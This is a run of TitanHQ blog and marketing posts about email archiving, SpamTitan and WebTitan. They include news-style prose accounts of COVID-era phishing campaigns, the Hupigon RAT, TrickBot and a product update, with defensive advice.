There are several reasons why a third-party email archiving solution for Office 365 is a wiser choice that using the email archiving function provided by Microsoft. Microsoft Office 365 is a superb productivity suite that combines many useful software programs into one convenient package, but one issue that is often raised is the email archiving options provided are somewhat basic. Email archiving is available, but the features and capabilities of that service fall well below third-party email archiving solutions.
Email archiving is a legal requirement and essential for modern businesses. Email is part of the corporate record and messages must be retained and produced during compliance audits, when there are legal disputes as part of eDiscovery requests, and to help resolve HR issues. The failure to provide emails can prove very costly. Regulatory fines have been issued in cases where important emails have not been retained and legal disputes can be easily lost if an accurate email record is not maintained.
Email archiving is not just a checkbox item than must be implemented for compliance. The email archive will need to be accessed and used, which is where the more comprehensive features of a third-party email archiving solution are required.
Searching for emails in an Office 365 email archive can be a pain. The search function is OK, but the search mechanism is nowhere near as efficient as third-party email archiving solutions such as ArcTitan. One of the main benefits of an email archive is the ability to rapidly search and retrieve emails, so search efficiency is important. The default search limit is 250 results with Office 365, which doesn’t lend itself to large scale searching.
Emails often do not contain the information you need in the message body or headers. Data is often stored in email attachments, and this is an area where Office 365 email archiving comes up short. The advanced search functionality of third-party solutions can greatly reduce the time and effort required to find the emails you need. If you need to find data in email attachments, Microsoft will only search in around 50 attachment types and there are many other types of attachments that may contain the data you need.
There are also issues with licensing. With Office 365, licenses are paid per mailbox so when a user leaves the company you need to maintain the mailbox and its associated archive, which is tied to the life of the mailbox. That means continuing to pay for that user and purchasing an additional license for the replacement employee. Over time, that means the cost of the solution can mount significantly, even if your total number of employees remains the same. If like many businesses you need to retain emails for 7 years, during that time a lot of staff may leave the company. Over time the cost of Office 365 archiving is likely to be far higher than you would pay with a third-party solution.
Importing legacy emails into Office 365 archives can be a pain and long-winded process and exporting files from the archive can also be problematic. Third-party solutions such as ArcTitan allow you to import legacy emails rapidly export email data in a wide variety of formats. If ever you decide to change email archiving provider, with ArcTitan this is simple.
ArcTitan supports comprehensive policy-based archiving, including message and attachment de-duplication for faster search and retrieval. You get customizable retention periods and policies for users, email content, and attachments, and lightening fast search and retrieval, with searches that can interrogate up to 30 million emails a second.
Office 365 is a great email solution, but there are disadvantages that are not found in solutions such as ArcTitan. It is a far better choice to opt for an archiving solution that has been developed by a company that specializes in email archiving, such as TitanHQ. You will get a much more comprehensive range of features that will save you time, effort, and money.
To find out more about ArcTitan, to discover how easy the solution is to configure and use and how much you can save over other solutions, give the TitanHQ team a call today. The team will be happy to schedule a product demonstration to show you the key benefits of the solution.
A phishing campaign that spreads a remote access trojan called Hupigon, a RAT that was first identified in 2010, is targeting higher education institutions in the United States.
The Hupigon RAT has previously been deployed by advanced persistent threat groups (APT) from China, although this campaign is not thought to have been operated by APT groups, instead the Hupigon RAT has been repurposed by hackers. While many industries have been targeted in the campaign, almost half of attacks have been conducted on colleges and universities.
The Hupigon RAT allows the operators to install other malware variants, steal passwords, and obtain access to the microphone and webcam. Infection could see the hackers take full management of an infected device.
The campaign uses online dating lures to trick users to install the Trojan. The emails show two dating profiles of supposed users of the platform, and the recipient is directed to select the one they find the most attractive. When the user makes their choice, they are brought to a website where an executable file is downloaded, which installs the Hupigon RAT.
The choice of lure for the campaign is no doubt influenced by the huge increase in popularity of dating apps during the COVID-19 pandemic. While there are not many actual dates taking place due to lockdown and social distancing measures now in place around the world, the lockdowns have seen many people with a lot of time on their hands. That, coupled with social isolation for many single people, has actually led to a rise in the use of online dating apps, with many users of the apps turning to Zoom and FaceTime to have virtual dates. Many popular dating apps have reported a rise in use during the COVID-19 pandemic. For instance, Tinder reports use has grown, with the platform having its busiest ever day, with over 3 billion profiles swiped in just one day.
As we have already seen with COVID-19 tricks in phishing attacks, which account for most lures during the pandemic, when there is interest in a particular event or news story, hackers will take advantage. With the popularity of dating apps surging, we can expect to see an rise in the number of online dating -themed lures.
The advice for higher education institutions and companies is to ensure that an advanced spam filtering solution is in place to prevent the malicious messages and ensure they do not land in end users’ inboxes. It is also crucial to ensure that security awareness training is still being conducted for staff, students, and remote employees to teach them how to spot the signs of phishing and other email threats.
TitanHQ can be os assistance. If you wish to better protect staff, students, and employees and keep inboxes free of threats, give the TitanHQ team a call as soon as you can. After registering, you can be protecting your inboxes in no time.
In this post we will explain some of the important benefits of an email archiving service. If you are not currently archiving your email, we will explain how a small investment can actually save you a lot of money in the long run.
One of the most important reasons for setting up an email archive is to reduce the cost of long-term email storage. By sending a copy of your emails to an archive, you can significantly reduce mail server management costs. Businesses that use ArcTitan for email storage typically save up to 75% in email storage space, they eliminate the need for mailbox limits and significantly improve the performance of their mail servers. All emails sent and received by employees are automatically sent to the archive which means emails will never be lost or accidentally deleted.
All businesses need to comply with regulations concerning data storage and an email archive will helps to ensure compliance. Even if you are not in a regulated industry, it is still important to retain emails for legal purposes. An email archive is a tamperproof repository for all emails. In the event of a regulatory audit, eDiscovery request, or a customer dispute, you will be able to quickly find all relevant emails. It has been estimated that around 80% of U.S. companies are currently engaged in legal action. Email is part of the corporate record and emails must be produced in the event of legal action. You will also need to recover emails in any HR disputes. Email backups serve their purpose, but an email archive will ensure that all email can be recovered if disaster strikes, without any fear of data corruption.
One of the most important benefits of an email archiving service is fast message retrieval. If you need to recover emails from a backup, it could take days or even weeks to find the messages you need, as backups are not searchable. All emails sent to an archive are indexed, which means the archive can be searched and emails can be found and recovered in seconds, regardless of how many emails are in the archive and how long ago a message was sent.
With emails stored in a cloud archive, you will always have access to emails no matter where you are located. You can simply login to your archive using a web-based interface that can be accessed on any internet enabled device.
Creating an Email Archiving Policy
When you are creating your email archiving policy, there are two main approaches to take. The first is to set your policy for what types of emails need to be sent to the archive and then to leave it to your employees to follow that policy and archive all emails that need to be stored. The other option is to automate the process. While the first option will reduce the amount of storage space you need, it is a risky strategy. If an email that must be retained is not sent to the archive, the mistake could prove very costly if you are audited or receive an eDiscovery request and you cannot produce the email. The Financial Industry Regulatory Authority (FINRA) fined Scottrade $2.6 million in 2015 for failing to retain certain categories of outgoing emails.
The best approach to take is to set an email archiving policy and to automate the process. This will ensure that come what may, you will always be able to recover emails on demand. This option will require more storage space, but with ArcTitan, space is kept to a minimum. ArcTitan uses deduplication, which involves only storing one copy of a message. If you send an email to a distribution group internally, there is no need to store every copy of that message. ArcTitan will only store one copy of every unique message and all messages are compressed to further reduce storage space.
Whenever an email needs to be retrieved, ArcTitan performs lightning fast searches, and even allows you to quickly search inside common attachment types. Your employees can even access their archived emails through their mail client – Outlook for instance – which means they will not need to trouble your IT department when they accidentally delete an email from their inbox. A search can be performed, and the email can be retrieved instantly on demand.
Discover Why so Many Businesses are Using ArcTitan
TitanHQ has developed ArcTitan to make archiving emails an effortless process. ArcTitan works seamlessly with almost all corporate mail systems and ensures that all emails are stored securely in the cloud where they can be accessed on demand in seconds.
ArcTitan supports comprehensive policy-based archiving to ensure that you only store the emails that must be retained, and policies can be set to ensure that emails are securely deleted automatically at the end of the email retention period. ArcTitan gives you maximum flexibility and control, world class security, enterprise-grade resilience, and lightning fast retrieval of messages when you need them. Users benefit from an intuitive user interface and a significant range of features that are not present in the archiving offerings in Exchange and Office 365.
To find out more about ArcTitan call TitanHQ and to schedule a product demonstration, give the TitanHQ team a call today and find out the difference ArcTitan can make to your business.
The lockdown put in place as a result of COVID-19 has forced employees to leave the office and work from home, with contact taking place over communications solutions such as Skype, Slack, and Zoom. Unsurprisingly the huge increase in use of these platforms has led to an opportunity for cybercriminals, who are using fake alerts from these and other communication and teleconferencing platforms as lures in phishing campaigns on remote workers.
Many campaigns have been discovered that take advantage of the popularity of these platforms. One campaign has recently been discovered that uses Skype branding advising users that they have pending alerts. The emails are personalized and include the Skype username and feature a review button for users to click to review their alerts. These emails look extremely like the actual emails sent to users by Skype. The emails also appear, at first glance, to have been sent from an authentic email address.
The link given in the email takes the recipient to a hxxps website that has Skype in the domain name. Since the connection between the browser and the website is encrypted, it will show the green padlock to show that the connection is safe, as is the case on the genuine Skype domain. The webpage includes Skype branding and the logo of the company being targeted and says that the webpage has been set up for authorized use by employees of the business. The username of the victim is automatically added to the login page, so all that is needed is for a password to be entered.
This campaign was first noticed by Cofense, which received many reports from business users about the emails, which bypassed Microsoft Exchange Online Protection (EOP) and were delivered to Office 365 inboxes.
A Zoom campaign has also been discovered that uses similar tactics. Zoom is one of the most popular lockdown teleconferencing apps and has been recommended by many companies for use by employees to maintain contact during the lockdown. The platform has also been very popular with consumers and now has more than 300 million users.
In this campaign, Zoom meeting alerts are sent to targets. As is common with phishing campaigns, the hackers generate fear and urgency to get the targets to respond quickly without reviewing the messages. This campaign advises the recipients to login to a meeting with their HR department in relation to their job termination. Clicking the link will similarly bring users to a fake login page where they must enter their credentials. The landing page is a virtual carbon copy of the official Zoom login page, although the only parts of the page that work are the username and password fields. This campaign was discovered by Abnormal Security, which reports that around 50,000 of these messages were sent to Office 365 accounts and bypassed EOP.
The phishing emails are believable, the webpages that users are brought to look genuine, and many people will be tricked by the emails. Security awareness training will help to train employees to question emails such as these, but given the amount of messages that are bypassing Microsoft’s EOP, businesses should also think about adding an additional layer of email security to their Office 365 accounts.
This is an area where TitanHQ can be of assistance SpamTitan Cloud does not replace EOP for Office 365, it allows businesses to take advantage of an extra layer of protection on top to provide extra protection from zero-day attacks. SpamTitan Cloud prevents spam, phishing, and malware laced emails that would otherwise be sent to Office 365 inboxes.
SpamTitan Cloud is quick and simple to set up and you can safeguard your Office 365 accounts very quickly. Since the solution is available on a free trial, you will be able to consider the difference it makes and see how many malicious messages it blocks before committing to buying it.
To find out more about improving your phishing defenses, give the TitanHQ team a call now.
Are you worried about the cybersecurity risks associated with a largely at-home workforce? Want to find out how you can improve protection for your remote workers and block malware, ransomware and phishing attacks?
On Thursday May 21, 2020 TitanHQ is hosting a webinar to explain how you can easily double protection for your remote workers. This webinar is ideal for current SpamTitan customers, prospective customers, Managed Service Providers and small- to medium-sized enterprises.
During the webinar you’ll find out why it is so important to protect against both the email- and web-based components of cyberattacks and you will discover more about an important layer that can be added to cybersecurity defenses that is often lacking at many SMBs and small- to medium-sized enterprises.
During the webinar TitanHQ will discuss how cybercriminals are exploiting COVID-19 to conduct cyberattacks and how you can better protect the remote workers that are being targeted by cyber actors. You will also discover the WebTitan features and security layers for managing user security at multiple locations with a deep dive into the features and benefits of the latest version of WebTitan Security.
Most cyberattacks have an email and web-based component – Find out how WebTitan serves as a vital layer of security to block phishing attacks, malware and ransomware downloads.
Learn why WebTitan is the leading web security option for the Managed Service Provider who service the SMB and SME market.
Join TitanHQ for the webinar, which will be attended by:
Derek Higgins, Engineering Manger TitanHQ
Eddie Monaghan, Channel Manager TitanHQ
Marc Ludden, Strategic Alliance Manager TitanHQ
Kevin Hall, Senior Systems Engineer at Datapac
Title: Keeping your Remote Workers TWICE as secure with SpamTitan & WebTitan
UK think tank Parliament Street has produced a report that uncovers has revealed the extent to which universities are being focused on by hackers and the sheer amount of spam and malicious emails that are sent to the inboxes of university staff and students.
Data related to malicious and spam email amounts was obtained by Parliament Street through a Freedom of Information request. The analysis of data from UK universities showed they are having to block millions of spam emails, hundreds of thousands of phishing emails, and tens of thousands of malware-laced emails every year.
Warwick University’s figures indicate that over 7.6 million spam emails were sent to the email accounts of staff and students in the last quarter of 2019 alone, which included 404,000 phishing emails and more than 10,000 emails including malware.
Bristol University encountered a similar level of focus withmore than 7 million spam emails over the same period, 76,300 of which included malware. Data from the London School of Hygiene and Tropical Medicine showed that more than 6.3 million spam emails were registered during 2019, which included almost 99,000 phishing emails and over 73,500 malware attacks. 12,773,735 spam and malicious emails were received in total for 2018 and 2019.
Data from Lancaster University showed that over 57 million emails were rejected for reasons such as spam, malware, or phishing, with 1 million emails marked as possible spam. The figures from Imperial College London were also worrisome, with almost 40 million emails intercepted during 2019.
Like attacks on firms, cyberattacks on universities are often conducted for financial profit. These attacks attempt to send malware and obtain credentials to obtain access to university networks to exfiltrate data to sell on the black market. Universities store huge amounts of sensitive student data, which is extremely valuable to hackers as it can be leveraged for identity theft and other types of fraud. Attacks are also conducted to send ransomware to steal money from universities.
Universities normally have high bandwidth to support tens of thousands of students and employees. Attacks are conducted to hijack devices and add them to botnets to conduct a range of cyberattacks on other targets. Email accounts are being hijacked and used to run spear phishing attacks on other targets.
Nation state-backed advanced persistent threat (APT) groups are focusing on universities to gain access to intellectual property and research data. Universities carry out cutting edge research and that information is extremely valuable to companies who can use the research data to develop products to gain a massive competitive advantage.
Universities are viewed as relatively soft targets compared to groups of a similar size. Cybersecurity defenses tend to be far less advanced, and the large networks and number of devices used by staff and students make defending networks complicated.
With the amount of cyberattacks on universities increasing, leaders of higher education institutions need to implement measures to enhance cybersecurity and prevent the attacks from succeeding.
The majority of threats are sent over email, so advanced email security defenses are essential, and that is an area where TitanHQ can be of assistance.
Independent tests confirm that SpamTitan blocks in excess of 99.97% of spam email, helping to keep inboxes free of junk email. SpamTitan uses dual anti-virus engines to block known threats, machine learning to spot new types of phishing attacks, and sandboxing to discover and block zero-day malware and ransomware threats. When email attachments get past initial tests, suspicious attachments are moved to the sandbox for in depth analysis to identify command and control center callbacks and other malicious actions. SpamTitan also uses SPF and DMARC controls to prevent email impersonation attacks, data loss prevention controls for outbound messages and controls to discover potential email account compromises.
If you wish to enhance cybersecurity defenses, begin with upgrading your email security defenses with SpamTitan. You may be shocked to learn how little investment is required to majorly enhance your email security defenses. To discover more get in touch with TitanHQ now.
The TrickBot Trojan is a complex banking Trojan that was first identified in 2016. While the malware was first just an information stealer dedicated to stealing online banking credentials, the malware has evolved massively over the past four years and several modules have been added that provide a host of other malicious capabilities.
The TrickBot Trojan’s information stealing capabilities have been greatly enhanced. In addition to banking credentials, it will steal system and network data, email credentials, tax data, and intellectual property. TrickBot is capable of moving laterally and silently infecting other computers on the network using authentic Windows utilities and the EternalRomance exploit for the SMBv1 vulnerability. The malware can place a backdoor for persistent access. TrickBot also acts as a malware installer and will download other malicious payloads, such as Ryuk ransomware.
The Trojan is often updated and new variants are regularly made available. The Command and Control infrastructure is also constantly changing. According to a review by Bitdefender, more than 100 new IPs are added to its C&C infrastructure each month with each having a lifespan of around 16 days. The malware and its infrastructure are highly complex, and while steps have been taken to dismantle the operation, the hackers are managing to stay one step ahead.
TrickBot is primarily shared using spam email through the Emotet botnet. Infection with Emotet sees TrickBot downloaded, and infection with TrickBot sees a computer added to the Emotet botnet. Once all useful data has been obtained from an infected system, the baton is passed over to the Ryuk ransomware operators with a reverse shell opened giving the Ryuk ransomware operators access to the netword.
A recent review of a variant captured by Bitdefender on January 30, 2020 has shown another method of distribution has been added to its arsenal. The Trojan now has a module for bruteforcing RDP. The brute force RDP attacks are mainly being carried out on organizations in the financial services, education, and telecom industries and are currently targeted on organizations in the United States and Hong Kong at this stage, although it is likely that the attacks will spread region-by-region over the coming weeks. The attacks are being conducted to steal intellectual property and financial data.
Since the TrickBot Trojan is modular, it can be always be updated with new features and the evolution of the malware so far, and its success, means it will go on being a threat for some time to come. Thankfully, it is possible to prevent infections by practicing good cyber hygiene.
Spam is still the main method of delivery for both the Emotet Trojan and TrickBot so an advanced spam filter is vital. Since new variants are constantly being made available, signature-based detection methods alone are not enough. SpamTitan incorporates a Bitdefender-powered sandbox to analyze suspicious email attachments for malicious activity. This ensures the malicious activity of completely new malware variants is identified and the emails are quarantined before they can cause any damage.
If you don’t require RDP, ensure it is turned off. If you do, ensure access is restricted and strong passwords are established Use rate restricting to block login attempts after a set number of failures and ensure multifactor authentication is implemented to prevent stolen credentials from being used.
For additional details on SpamTitan Email Security and to find out how you can enhance your defenses against email and web-based attacks, contact the TitanHQ team now.
The 2019 Novel Coronavirus pandemic has meant that many workers have had to self-isolate at home and an increasing number of employees wish to work from home to reduce risk of contracting COVID-19. Companies are under pressure to allow their workers to stay at home and use either company-issued or personal devices to log onto their networks and work remotely.
Cybercriminals are always changing their tactics, techniques, and procedures and they have jumped at the opportunity served up by the Novel Coronavirus. People are wary and rightly so. COVID-19 has a high mortality rate and the virus is spreading rapidly. People want information about cases in their local district, advice on how to safeguard themselves, and information about possible cures. Hackers have obliged and are conducting phishing campaigns that claim to offer all that information. Many campaigns have now been discovered from many different threat groups that attempt to obtain login credentials and spread malware. Since the start of January when the first major campaigns were detected, the volume of coronavirus and COVID-19 emails has increased majorly.
Campaigns are being run impersonating different governmental and non-governmental bodies on the Novel Coronavirus and COVID-19, such as the World Health Organization (WHO), the U.S. Centers for Disease Control and Prevention (CDC), the U.S. Department of Health and Human Services, and other government agencies. COVID-19-themed emails are being shared with remote workers that spoof HR departments warning about cases that have been detected within the group. Health insurers are being spoofed in campaigns that include invoices for information on COVID-19.
Since January, more in excess of 16,000 Coronavirus and COVID-19-themed domains have been registered which are being used to host phishing kits and distribute malware. Experts at CheckPoint Software report that those domains are 50% more likely to be malicious than other domains registered in the same length of time.
Email security and home working will naturally be a major worry for IT teams given the sheer number of home workers due to the Coronavirus pandemic and the volume of attacks that are now being conducted focusing on home workers. With so many devices now connecting to networks remotely, if cybercriminals do obtain credentials, it will be much more difficult for IT teams to identify threat actors connecting remotely. Luckily, there are steps that can be taken to improve email security and home working need not majorly increase risk.
You should see to it that your employees can only connect to your network and cloud-based services through a VPN. Enterprise VPNs can be set up to force all traffic through the VPN to reduce the potential for mistakes. Make sure that the VPN is set up to start automatically when the device is turned on up.
It is vital that all remote workers are protected by a strong and effective email security solution. It is not possible to stop hackers targeting remote workers, but it is possible to prevent phishing and malware threats from reaching inboxes.
To safeguard your employees against phishing attacks and malware, an advanced email security solution is vital. If you use Office 365 for email, do not use on Office 365 email security. You will need greater protection than Exchange Online Protection provides to safeguard against phishing, spear phishing, and zero-day threats.
SpamTitan has a number of different detection mechanisms to identify and block the full range of email threats. SpamTitan incorporates SPF and DMARC to put in place protection against email impersonation attacks, machine learning algorithms and predictive technology to safeguard from zero-day attacks, advanced phishing protection from whaling and spear phishing attacks by scanning inbound email in real-time, dual antivirus engines to prevent malware threats, and sandboxing for in depth analysis of suspicious attachments. SpamTitan also incorporates 6 specialist RBLs, supports whitelisting, blacklisting, and greylisting, and uses multiple threat intelligence feeds.
There is a higher risk of insider threats with remote workers. To supply protection and to prevent accidental policy breaches, SpamTitan has a data loss prevention filter to stop credit card numbers, Social Security numbers, and other data types from being sent over email.
No email security solution can 100% prevent all email threats from infiltrating your inbox, 100% of the time. It is therefore important to provide regular cybersecurity training to employees to make them knowledgeable of phishing threats, train them how to identify a phishing email or social engineering scam, and to condition remote employees how to react should a threat be received. Phishing simulation exercises are also helpful to see which employees require additional training and to identify possible gaps in training programs. IT security basic training refreshers should also be given to ensure employees know what can and cannot be completed with work devices.
Multi Factor authentication must be put in place on all applications and email accounts to add security in the event of an account compromise. If credentials are stolen and used from a previously unknown location or an unfamiliar device, a second authentication factor must be given before access is granted. You should also turn off macros on all user devices, unless a specific user needs to use macros for work reasons.
To discover more about how you can enhance email security for remote workers, give the TitanHQ team a call now. You can set up a demonstration to see SpamTitan in action and you can also register for a free trial to put SpamTitan to the test on your own network.
Blackpoint Cyber has unveiled its Remote Reality LIVE conference, which will take place over the Internet from April 8-9th.
The conference will provided insights on managed service providers (MSPs) and how they can stay secure, profitable, and resilient as the world increases remote operations during the COVID-19 pandemic – registration and attendance are free of charge. The two-day conference will include sessions by former leaders of the United States’ government cyber security and intelligence communities along with cyber security experts and business veterans from the MSP services and technology sector.
Jon Murchison, Blackpoint’s CEO and founder, and former US government cyber operations expert, saus of rthe the conference’s objective: “IT services and infrastructure have become mission critical for organizations to survive in this new economic landscape brought on by COVID-19. MSPs are the key to our success and, especially during these times, a collective national asset to their respective countries. That’s why we are bringing together experienced government and industry leaders to help MSPs navigate the current economic and security environments. We’re excited to provide one of the first online and socially-distanced conferences dedicated to MSPs and cyber security.”
Blackpoint work with leading technology, service, and marketing firms for the conference, including:
Datto: leading global supplier of cloud-based software and technology solutions purpose-built for MSPs
Webroot: Cybersecurity Solutions Purpose-Built for MSPs and SMBs
Convergint: Global, Service-based Systems Integrator
Marketopia: Lead Generation and Marketing for Technology Companies
ID Agent: Dark Web and Identity Theft Protection
TitanHQ: Email and DNS Security
Compliancy Group: HIPAA Compliance-as-a-Service
Atlantic Data Forensics: Premier Incident Response and Forensics
ProSource Technology Solutions: Leading Managed Service Provider
Corporate Office Properties Trust (COPT): Premier Real Estate Investment Trust
Michael Morell, former Deputy Director and Acting Director CIA, is giving the keynote session on national security implications of the Coronavirus Pandemic. While he worked at the CIA, Mr. Morell was President George W. Bush’s daily intelligence briefer during the 9/11 attacks and was awarded the Distinguished Intelligence Medal, the CIA’s second highest honor.
Other expert speakers include: Bill Priestap, former FBI Assistant Director of Counterintelligence, Chris Inglis, Former Deputy Director of NSA, Dave Sears, retired Commander and Navy SEAL, and Kevin Donegan, former United States Navy Vice Admiral and previous commander of the US Navy’s 5th fleet out of Bahrain. Security and MSP sector leaders will also present informational sessions, such as lead generation in a virtual world, security in the MSP space, cyber security for commercial real estate, the threat landscape of remote workers, and more.
Matt Solomon, VP of Business Development & IT at ID Agent, said: “ID Agent is very excited to participate in one of the first virtual MSP events since in-person events have been taken off the schedule. MSPs still need education during this period and we are honored to be part of such an esteemed group of vendors.”
Along with learning how to stay safe and prosper, conference attendees will also be eligible for giveaways and prizes.
The importance for security awareness for remote workers has been further emphasised of late as there have never been more people working from home as there are now during the COVID-19 pandemic.
Sadly, remote workers are now being actively targeted by hackers who see them as providing an easy way to obtain access to their corporate networks to steal sensitive data, and install malware and ransomware.
Companies may have already given their staff security awareness training to make sure they are made aware of the risks that they are likely to come across and to teach them how to recognize threats and respond. However, working from home introduces many more risks and those risks may not have been covered in security awareness training sessions designed for protecting office workers. It is also important to conduct training regularly and to reinforce that training. This is especially important for remote workers, as risk grows when employees are working remotely.
Better Security Awareness for Remote Workers Necessary as COVID-19 Crisis Worsens
Naturally, as an email security solution provider, we strongly advise the use of a strong email security solution and layered technical defenses to safeguard against phishing, but technical measures, while effective, will not stop all threats from reaching inboxes. It is all too simple to place too much reliance on technical security solutions for safeguarding email environments and work computers. The truth is that even with the best possible email security defenses configured, some threats will end up reaching inboxes.
The importance of conducting security awareness training to the workforce and the benefits of doing so have been highlighted by many studies. One benchmarking study, conducted by the security awareness training provider KnowBe4, showed that 37.9% of employees are tricked by phishing tests if they are not provided with security awareness and social engineering training. That figure has grew by 8.3% from the previous year. With security awareness training and phishing email simulations, the figure fell to 14.1% after 90 days.
During the COVID-19 pandemic, the amount of phishing emails being sent has grown significantly and campaigns are being conducted targeting remote workers. The focus of the phishing campaigns is to obtain login credentials to email accounts, VPNs, and SaaS platforms and to distribute malware and ransomware.
With so many staff now working from home, and the speed at which firms have had to transition from a largely office based workforce to having virtually everyone working from home may have resulted in security awareness training for remote workers put on the long finger. However, with the lockdown likely to go on for several months and attacks on the rise, it is important to make sure that training is conducted, and as soon as possible.
More COVID-19 Domain Registrations and Rise in Web-Based Attacks
Security awareness training for remote workers also should incorporate internet security as not all threats will arrive in inboxes. CMost phishing attacks have a web-based component, and malicious websites are being created for drive-by malware downloads. At present, the vast majority of threats are using COVID-19 and the Novel Coronavirus as bait to get remote workers to install malware, ransomware, or part with their login credentials.
Unsurprisingly, hackers have increased web-based attacks, which are being conducted using a plethora of COVID-19 and Novel-Coronavirus themed domains. By the end of March, around 42,000 domains related to COVID-19 and coronavirus had been set up. A review by Check Point Research showed those domains were 50% more likely to be malicious than other domains registered over the same period of time.
It is important to increase awareness of the dangers of using corporate laptops for personal use such as browsing the Internet. Steps should also be taken to restrict the websites that can be accessed by employees and, at the very least, a solution should be implemented and configured to prevent access to known malicious websites that are used for phishing, fraud, and malware distribution.
Shadow IT is a Major Security Danger
When employees are office based and logged onto to the network, identifying shadow IT – unauthorized software and hardware used by employees – is easier. The issue not only becomes harder to identify when employees work from home, the risk of unauthorized software being installed onto corporate-issued devices increases.
Software installed on work computers carries a risk of a malware infection and potentially offers an easy way to attack the user’s device and the corporate network. IT teams will have little knowledge of unauthorized software on users’ devices and whether it is running the most recent version and has been patched against known flaws. It is important to cover shadow IT in security awareness training for remote workers and to make it clear that no software should be downloaded to work devices and that personal USB devices should not be used on corporate devices without the go-ahead being given from the IT department.
The COVID-19 pandemic has seen many workers turn to teleconferencing software to communicate with the office, friends, and family. One of the most popular teleconferencing platforms is Zoom. Malicious installers have been identified that install the genuine Zoom client but have been bundled with malware. Installers have been discovered that also install adware, Remote Access Trojans, and Coinminers.
How TitanHQ Can Be Used
Many security awareness training firms have made resources available to businesses free of charge during the COVID-19 crisis to help them educate the workforce, such as the SANS Institute. Take advantage of these resources and share them with your workforce. If you are a small SMB, you may also be able to get access to free phishing simulation emails to test the workforce and reinforce training.
TitanHQ can’t help you with your cybersecurity awareness training but we can help by seeing to it tthat employees have to deal with fewer threats by protecting against email and web-based attacks.
SpamTitan is an advanced and powerful cloud-based email security solution that will safeguard remote workers from phishing, spear phishing, malware, virus, and ransomware attacks by blocking attacks at source and stopping the threats from reaching inboxes. SpamTitan features dual anti-virus engines to safeguard against known malware threats and sandboxing to block unknown (zero-day) malware threats. SpamTitan incorporate many real-time threat intelligence feeds to block current and emerging phishing attacks and machine learning technology detects and blocks previously unseen phishing threats. SpamTitan has been designed to work seamlessly with Office 365 to allow businesses to set up layered defenses, augmenting Microsoft’s protections and adding advanced threat detection and blocking capabilities.
WebTitan is a DNS filtering solution that will safeguard all workers from web-based attacks, no matter where they access the internet. WebTitan uses zero-minute threat intelligence and blocks malicious domains and webpages as soon as they are discovered. The solution can also be used to carefully manage the types of websites that remote workers can access on their corporate-owned devices, via keyword and category-based controls. WebTitan can also be set up to block the downloading of malicious files and software installers to manage shadow IT.
For more details on protecting your business during the COVID-19 crisis, to set up a product demonstration of SpamTitan and/or WebTitan, and to register for a free trial of either solution to allow you to start instantly protecting against email and web-based dangers get in touch with TitanHQ now!
A new phishing campaign has been discovered that uses the Microsoft Sway file sharing service in a three-stage attack to steal the Office 365 credentials of high-level executives.Group IB experts identified the campaign and labelled it it PerSwaysion, although versions of the attack have been identified that have used OneNote and SharePoint. The campaign is highly focused and has been conducted on high-level executives at more than 150 firms. The individuals behind the campaign are believed to be based in Nigeria and South Africa, with the earliest traces of the attacks indicating the campaign has been operational since around the middle of last year.
The PerSwaysion attack begins with a spear phishing email sent to an executive in the targeted group. The phishing emails include a PDF file attachment with no malicious code embedded. The PDF file just includes a link that the user is must click to view the content of the file. The link brings the user to file on a Microsoft Sway page, which also requires them to click a link to view the content. Microsoft Sway allows the previewing of the document and shows the content without the user having to open the document. The document states the name of the sender – a known contact – and that individual’s email address with the message that a file has been shared for review and also a hyperlink with the text ‘Read Now’. Clicking the link directs the user to a phishing page with an Office 365 Single Sign-on login prompt.
The initial PDF file, Microsoft Sway page, and the login prompt on the phishing page all have Microsoft Office 365 logos, and it is easy to see how many victims would be fooled into sharing their credentials.
Once credentials have been gathered, they are used the same day to access the Office 365 account, email data is copied from the account, and it is then used to broadcast further spear phishing emails to individuals in the victim’s contact list. The sent emails are then erased from the victim’s sent folder to ensure the attack is not discovered by the victim.
The emails include the sender’s name in the subject line, and since they have not been sent from the account of a known contact, they are more likely to be clicked on. The lure used is simple yet successful, asking the recipient to open and review the shared document.
Many of the attacks have been targeted on individuals at companies in the financial services sector, although law firms and real estate companies have also fallen victim. Most attacks have been conducted in the United States and Canada, United Kingdom, Netherlands, Germany, Singapore, and Hong Kong.
It is possible that the cybercriminals are still accessing the compromised emails accounts to take sensitive data. Since the campaign targets high level executives, the email accounts are likely to include valuable intellectual property. They could also be used for BEC scams to fool employees into completing fraudulent wire transfers.
A new version of TitanHQ’s cloud-based anti-spam service and anti-spam software was made available on March 5, 2018. SpamTitan version 7.00 incorporates patches for recently identified flaws in the ClamAV antivirus engine and a change to the primary AV engine used by the solution.
The main anti-virus engine of SpamTitan version 7.00 is supplied by the Romanian firm Bitdefender. Bitdefender is an award-winning antivirus engine that provides strong email protection against malware, viruses, and ransomware. Combined with the secondary AV engine – ClamAV – users take advantage of excellent protection against email-based malware and ransomware attacks. The dual AV engines see to it that malicious software is not delivered to end users’ inboxes via email attachments.
The change to Bitdefender was the obvious choice and TitanHQ is planning to further its strategic relationship with the Romanian cybersecurity business over the coming weeks and months. The amendment to the primary AV engine will be unnoticeable to existing users, who will still be protected from malicious threats.
The update to the most recent version will not happen automatically. Customers who have ‘prefetch of system updates’ enabled on their SpamTitan installations will be able to see the newest version in their list of available updates and can manually trigger the update to the new version. Customers who do not have that option turned on need to “check for updates” via their user interface.
Customers have been advised to review the documentation accompanying the latest version before installation as it includes important information on how the update should be applied. TitanHQ explains that it is not possible to update from v4 or v5 of the platform to SpamTitan version 7.00 without initially installing version 6 of the platform.
Customers should remember that the update must be applied before May 1, 2018 to ensure continued protection, as support for the Kaspersky AV engine – used in all versions of SpamTitan prior to v7 – will come to an end on that date. TitanHQ has also informed customers that support for v4 and v5 of SpamTitan will also cease from May 1, 2018.
SpamTitan v7.00 includes patches for the following flaws: CVE-2017-12374, CVE-2017-12375, CVE-2017-12376, CVE-2017-12377, CVE-2017-12379, CVE-2017-12380. All of those flaws exist in ClamAV. The most recent version also improves protection against DoS attacks and should be run as soon as possible. The update will take around 10-20 minutes to run.
During this unprecedented time of uncertainty, the health and safety of our staff, clients, partners and their families is one of our main focuses and concerns. Team TitanHQ are dedicated to supporting our partners and customers. The advantages provided by our email and web security products are even more relevant and crucial now.
Our fantastic team has met at the challenge with vigor and we have mobilized our workforce so that it’s business as usual over this unusual period of time. We are taking counsel from the government on best practice and have a task force in place to manage our work.
Customers and partners can be happy that support teams will continue to be available and product teams are working as normal. If you have any queries or concerns about products, or technical support, please contact us as you normally would The support team has been trained to be aware of special customer concerns during this pandemic and will escalate any question to the relevant responsible person or department.
We are conscious that this is a sensitive time and we will do everything we can to make it easier for our customers. All of us at TitanHQ wish you good health and thank you for your continued business.
